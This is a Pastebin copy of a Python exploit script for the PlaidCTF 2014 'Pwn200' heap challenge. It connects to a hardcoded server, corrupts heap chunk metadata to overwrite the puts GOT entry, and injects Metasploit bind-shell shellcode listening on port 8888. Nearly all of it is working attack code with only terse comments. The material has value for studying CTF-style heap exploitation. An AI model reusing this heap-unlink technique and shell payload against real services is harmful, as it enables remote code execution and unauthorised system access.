Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Author: Danux Mitnick
- #Description: Pwn200 PlaidCTF 2014
- #Date: Apr 13th 2014
- import socket, time, struct
- def sock_recv(s, n):
- time.sleep(0.25)
- b = s.recv(n)
- print b
- return b
- def DoData(s, data):
- s.send(data)
- b = sock_recv(s,8096)
- def DoRun(s,n):
- s.send('%d\n'%n)
- b = sock_recv(s, 1024)
- return b
- s = socket.socket()
- s.connect(('54.81.149.239', 9174))#54.81.149.239:9174
- raw_input('Attach process with gdb here')
- b = sock_recv(s, 1024)
- DoRun(s,1) #id 0
- DoRun(s,256)
- DoRun(s,1) #id 1
- DoRun(s,256)
- DoRun(s,1) #id 2
- DoRun(s,256)
- DoRun(s,3) #change note
- DoRun(s,1) #id 1
- DoRun(s,276)
- #Now input your dataa
- sizes = "\xfc\xff\xff\xff"*2
- fd = "\x08\xa0\x04\x08" # readelf --relocs ezhp ->0804a008 puts
- bk = "\x60\xa0\x04\x08" #chunk_buffers holding heap addresses
- sc = 'A'*260 + sizes + fd + bk
- DoData(s,sc) #overwrite fd and bd headers of chunk id 2
- DoRun(s,2) #id 2 - delete note of corrupted heap
- DoRun(s,2)
- DoRun(s,3) #change note
- DoRun(s,1) #id 1 -> Now is pointing to heap addresses buffer
- DoRun(s,256) #size
- #Now input your data
- sc = '\x0C\xa0\x04\x08' + "\x90"*10
- #msfpayload linux/x86/shell_bind_tcp LPORT=8888 P
- sc2 =(
- "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
- "\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
- "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
- "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
- "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
- "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
- )
- sc = sc + sc2
- DoData(s,sc) #overwrite stack at 0804a008 - 0x114 - puts
- DoRun(s,4) #id 1 - print note 1 which is pointing to overwriten put address
- DoRun(s,1)
- "pwn200.py" 65L, 1706C 1,4 Top
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement